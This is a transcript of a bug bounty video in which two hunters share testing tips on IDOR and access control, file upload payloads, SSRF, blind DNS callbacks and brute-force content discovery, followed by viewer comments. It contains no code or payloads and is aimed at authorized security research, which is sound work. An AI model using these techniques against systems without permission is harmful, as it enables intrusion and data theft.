…Wow here we go..
alright so. people have been asking me a lot about stök how do you do your recon?
and the thing is that I don’t really do any recon. But when it comes down to
discussing what you do when you first approach a new target.
there’s different kinds of ideas of what you should do so.. i just decided to ask Jason Haddix about it..
So Jason when when you approach a new target what are the
things that are crucial… that a new bounty hunter doesn’t miss?
yeah I think a lot of the new bounty hunters will look at a target like something you have
to login to they’ll just start poking around if the external stuff like
external search forms and parameters on the outside and not really dive into
learning the application like actually using it like a user would if you think
of it like an iceberg and all you’re seeing is the tip when you start but you
need to get way down to the bottom of that iceberg where all the the sensitive
functionality probably is.
-oh yeah absolutely I get it so instead of just
poking around on the outside..
Access Privileges comes in play. Me
personally, what I do is that I you spin up burp and then i spend an hour
or two just walking through the website and trying different kind of things
logging out, logging into another user doing it again, and then eventually I’m
replaying these sessions to see if I’m able to do something as an unprivileged
user and then eventually as an admin – That’s exactly what I do in fact there’s
there’s some burp plug-ins for that kind of stuff but but I just keep everything
marked by hand honestly you sort like a spreadsheet or something and I say X
user can do x and y user can do Y and let’s see if they can do stuff to each
other and that’s the beginning of like my access control testing part which is
like the second tip I usually give people access control bugs and IDOR’s
are really important to to look for in bounty programs because there’s no like
library that fixes those types of bugs if you think of injection bugs a
patch couldn’t fix could fix an injection bug you know applying a
third-party library can fix cross-site scripting bugs but it’s really hard to
fix access control bugs And they are all logical right? yeah all logical – Cool.
Alright so next one.
yeah so when you’re on the site you’re gonna want to see how the site references you as a
user right it’s not it’s not always the cookies that register what you’re
doing or what you’re allowed to do on the site sometimes you know there’s a
unique identifier passed either in the URL or in some parameters someone
identifies you and that’s the first place I look for IDOR’s and stuff
like that but shortly after that its File uploads.
have found a majority of bugs this year on functionality for file uploads so when you log into the
application there’s always like a profile page on
enterprise application stuff or your image when I’m looking at a site I want
to find all the file uploads and identify them right there’s our RCE’s
where you piggyback command injection like image tragic and embedding
JavaScript inside of files you know there’s XML entity injection if if the
file format is based on XML like Word docs and stuff like that so file uploads
have just like a crazy amount of attack surface based on them and so I look at em. And its so challenging for people just to make sure that they sanitize it
all right and this is all that is also where some of the really golden goose
bugs appears it’s a great area to put a lot of research in I spend shit loads of
time you’re designing PDFs payloads inside them manually and I
learned how to write PDFs by hand now it’s a lot of waste of time but then
again my payloads are mmmm´ they are mint.
– yeah and then you
have next time right like once you put the investment in to make the template
for one of those uploads like you have it for next time – in fact mario from
cure 53 they have a repository that you can start with it’s got a on Cure 53s
github there’s a project where they have a whole bunch of file formats that have
XSS attacks in them and you can move off there and start modifying creating your
own directory for file formats and bugs associated to them.
yeah and the other tip there is a lot of days you’re not gonna get the direct feedback
from those types of bugs where the the application view actually shows you
that you have a bug, alot of them are blind nowadays right and what I do is I use
named in certain ways and use unique DNS
lookups for them and have this excel sheet where I overtime just log traffic
to my DNS server so I receive something hits and I know I remember that one
that’s like a month ago since I put that one in and then they you spun
it up again and this shit fucking happens..
Awesome.. alright so third place
where to look now? – what I’m doing is I’m looking at all the parameters and all of
the endpoints that took data so those are called dynamic parameters right and
I’m looking at with what kind of data they took was it a string was it a you
know was an alpha numeric was it just numerals and then eventually the places
that actually take paths and URLs and parse them parameters I’m gonna look at
those very very strictly for bugs like SSRF, local file includes, path
traversal, remote file includes any place that parses a path or a page
or references another place I’m gonna pay special attention to.
– if you are totally new at this, where would you recommend people to start.
um so a lot of times when you get into an application you know there’s an integration section
if it’s an enterprise application they’re trying to hook up other services
to their own site like a lot of fortune 100 companies use API is to pull in all
kinds of stuff. aaah. so its cross-platform
right so in that section of the app first to see if there’s any integrations
that they want to hook up via either web hook those are likely vulnerable, those
integration places are likely vulnerable to SSRF’s I see them a lot of times.
– And those are primarily not always automatable right, so it takes you a
little bit tweaking? it takes me alot of tweaking to find them. And if anyone
tells you SSRF’s are easy they are lying right, unless youre or generic SSRF payload really work out
of the box right it’s either the padding has to be changed like you gotta do
double or triple like you know forward or back slashes you got to reference
your domain like an octal its like all this crazy stuff right so
like I have to play around with them alot very rewarding, but when they pop it’s like I… get goosebumps just thinking about it they are so amazing the the feeling you
have where you can see that it hits your collaborator or hits your DNS server you
know like oh yeah yeah yeah I’ve got something. FOUR: a lot of people focus on
RCE and bugs that I actually think that private data, leaking private
data can be just as damaging in fact most of my authentication bypass type
bugs or logic type bugs or whatever you want to call them so content discovery
is king in this world right basically looking to our hidden paths that are not
linked anywhere on the web site administration panels you know log pages
-Are we talking brute forcing here?
-yeah we’re talking about brute forceing. here yeah so I mean I use a list that I’ve published pretty exclusively to do my my brute
forcing and my content discovery – The Jason Haddix ALL.TXT?
I wonder if its that one? ;)))
– I use that in my content discovery, its a huge list. by finding stuff off that list.
so directory brute forcing is something you wanna you want to do.
– And also if you new try to save all the endpoints that you stumble upon to your list curate your
word list is key Jason crate has created one of the best
lists out there but you have to redefine it because that way you will bring
a unique perspective to each and every engagement you enter.
Yeah and there’s there’s some people out there doing cool research right like the asset note guys
naffy and shubs and michael over there they released the common speak
dictionary which is pretty cool the but as you go you know add add your own
stuff there add your own paths and links when a new open-source project comes out
parse all the paths and add them to your content discovery right eventually
someone’s gonna make a mistake with access control.
Final and last tip. (FIVE)
If you’re on an app that is a messaging platform right the security of
the messages themselves the text of the message is just as important to them as
leaking you know piece of credit card information or getting an RCE
right so like what other than technical vulnerabilities do
care about and that gives me more like space to work in the application if I’m
not just looking for tech bugs absolutely and I totally agree I’ve
found something really really really nice high paying bugs, non-technical stuff
that we just “lying” around there but it didn’t execute until you did certain
kind of step.. fun times okay so thank you very much Jason hopefully this
would be a couple of tips for anyone that’s hungry to get started and starting to
look for ways about testing and bug bounties.. Have a good one and I’ll see
you around buddy

78 thoughts on “BUG BOUNTY METHODOLOGY TIPS TO ALWAYS TEST FOR! with Jason Haddix”

  1. Why content discovery never works for me?
    I usually launch content discovery on the main domain!
    Do i have to launch it on a particular endpoint or burp will eventually include that one on its own?

  2. Getting started on my first private bounty and following your videos has helped me alot, thank you for all you do!

  3. Can you do a vid discussing your HW? Looking to buy a laptop to run kali linux and still can't decide, would be interested to know how you decide on yours (especially when you travel) and if it is a factor for you at all or use just use whatever. Keep up the good vids man , good job!

  4. Wow !!! That is the best education content about hacking that I have ever seen !!!

    is a King !

  5. … hella bug bounty P3, burp went off found you, xss fuckin call in, xss fuckin call in… – ytcracker / touchscreen maison

    Appreciate the content. More bounty hunters the better, there are so many vulns to be fixed all over, saving one user/company at a time.

  6. Awesome Stök and Jason haddix very informative looking for nahamsec's and some other cool researchers recon steps sharing and also waiting for #Askstok 😀

  7. Great content, stay motivated and keep swinging for the fences. You'll eventually hit it.

  8. This video is insane !! I'd love to have more perspectives of other hunter on what they focus on.

  9. I wanna ask u something if we wanna hack a computer then how could we find the target ip address i am confused on it

  10. you are great bro i am a noob learing from books seraching poc and seeing what they are doiing but i am still confuse don,t know how to start confusion sucks

  11. Nice ideas in this talk. It would help if you could add links to the helping sources/projekts to the description of the video for reference.

  12. This video is really useful. I'm a bit confused tho, on haddix videos (hunter methodology 1,2 , 3) he heavily focus on recon but for a begginer like me doing recon has been pretty useless and a waste of time lol

  13. Hey stok, what's up, my tool is half build for embedding Xxe payload in document files, your 7.5k bug gave me an idea , I've not rewarded much for xxe's as many were out of scopes, but none the less you are a pro and I admire you!
    Hack like a pro! 😎

  14. Hey Stok thank you for the videos as always very informative. can you point me in the right direction of where to learn how to write my own PDF payloads? I've used tools but they don't always work and I feel like if I learned it myself it would be a lot better.

  15. Hey ! Just wanted to say your video's are great man, Found my first bug yesterday, unfortunately it was a dupe, but this video alone has given me a lot of ideas and stuff to research ! Keep it up, I look forward to the next video !

  16. I'm a total newbie here, and you are my hero. :Subscribe to you everywhereD Can't find jhaddix all.txt seclist btw

  17. Hi i need help what if we find gulp.js files on a website how can i use it or is it of any use

  18. This format with tips and screenshots are so useful, please keep it up!! I've learn a lot from this video. Thank you so much!! You guys are awesome.

  19. Hi Stok

    When doing bug bounty hunting do you use a VM, USB Persistant or you have a laptop set aside for that.

    Please let me know the advantages or disadvantages of each.

    Thank you

  20. Gonna start bug bounty hunting in a couple of weeks , spending the 5 months of summer holidays I have to find a bug and grind, Your vids help a lot would love some more beginner advice tutorials 😃

  21. I love this! I have recently started bug bounty which took a long time to prep for (as a high school student) and I’ve recently made my first bounty for a Xss! It took me forever to find it and I launched many burp intruder attacks and other random stuff like inspecting the code! Anyways thanks so much for these videos they really help!

  22. Personally i don't get too much new information from the videos as i have some experience in the topic, but it is a great pleasure to watch the way you talk and the way you make videos! Keep up with the great work you do!

  23. I would also say that programming or development courses do help a lot, as you get a better understanding of how exactly modern technologies are used. If you always get stuck at exploiting AWS, go get a development course on that!

  24. What programming language should I learn if I want to get into web application hacking/penetration testing?

  25. Kudos for learning to write PDFs by hand. I spent ~4 years on PDF and its specification and it pays off – but it is a pain especially at the beginning

  26. Your awesome! Im learning cyber security curse in school, and you make me want it more, im learning so much, i was upset that i sucks in code python, and must of my class know python, and i say to myself maybe is not for me, but after seeing your video, i see that i can be a good hacker and bug bunty without code

  27. @STÖK would you one day discuss some tip and tricks to monitoring a program.
    I have been hearing out a lot how people like you, Jason H monitor programs for new stuff, and I was wondering how this can be achieved.

  28. You mentioned you have a DNS server which logs traffic. Is this for when you're attempting code execution? If so, would that mean you have personal payloads that query your DNS server? Could you do a video on how one might set that up, or even just link me to some helpful articles to doing so?

    I've been thinking about it a lot because you might start testing for a bug, find one but when testing you can't execute "malicious" code. So a DNS payload sounds smart. I also know you can smuggle information out of a secure server via DNS too, so that is a double.

  29. Thanks for the great content!!

    Do you always work on apps, which offers bounty program or just choose one app, which you are in favor of? I'm scared if I would find a bug in an app, send them my report and they will call the lawyer's. Could that be a thing?

  30. Hey
    Thank you for your video mate, You are really doing a great job
    I have two approaches for this video
    First one : We would like to have like some sort references based on what Jason Said, You know the net is deep and it so how hard to find where to practice these attacks, it would be awesome if you can add to the videos the site or blogs where we can see details explained about each of mechanic you and him use or experts do
    Second one: Jason said that Directory brute-forcing is a necessity to find hidden directories… but like more than 90% of websites run Cloudflare and they block your attempts …
    Do you recommend like using proxies to do so or how you guys do it
    Anyways the video was great and keep it up <3

  31. First thx bro for sharing this awesome info 🙂
    Second Noob question 🙂 But how can I use that all.txt is it through Content discovery and then config tab and use it in custom file list or through the intruder !

  32. I just want to ask you onething>
    I am really intrested in bug bounty but I did not have much knowledge on programming language though I know little bit of c . What suggestion you would like to give to me to get started??
    Your replay would be appreciated!

Leave a Reply

Your email address will not be published. Required fields are marked *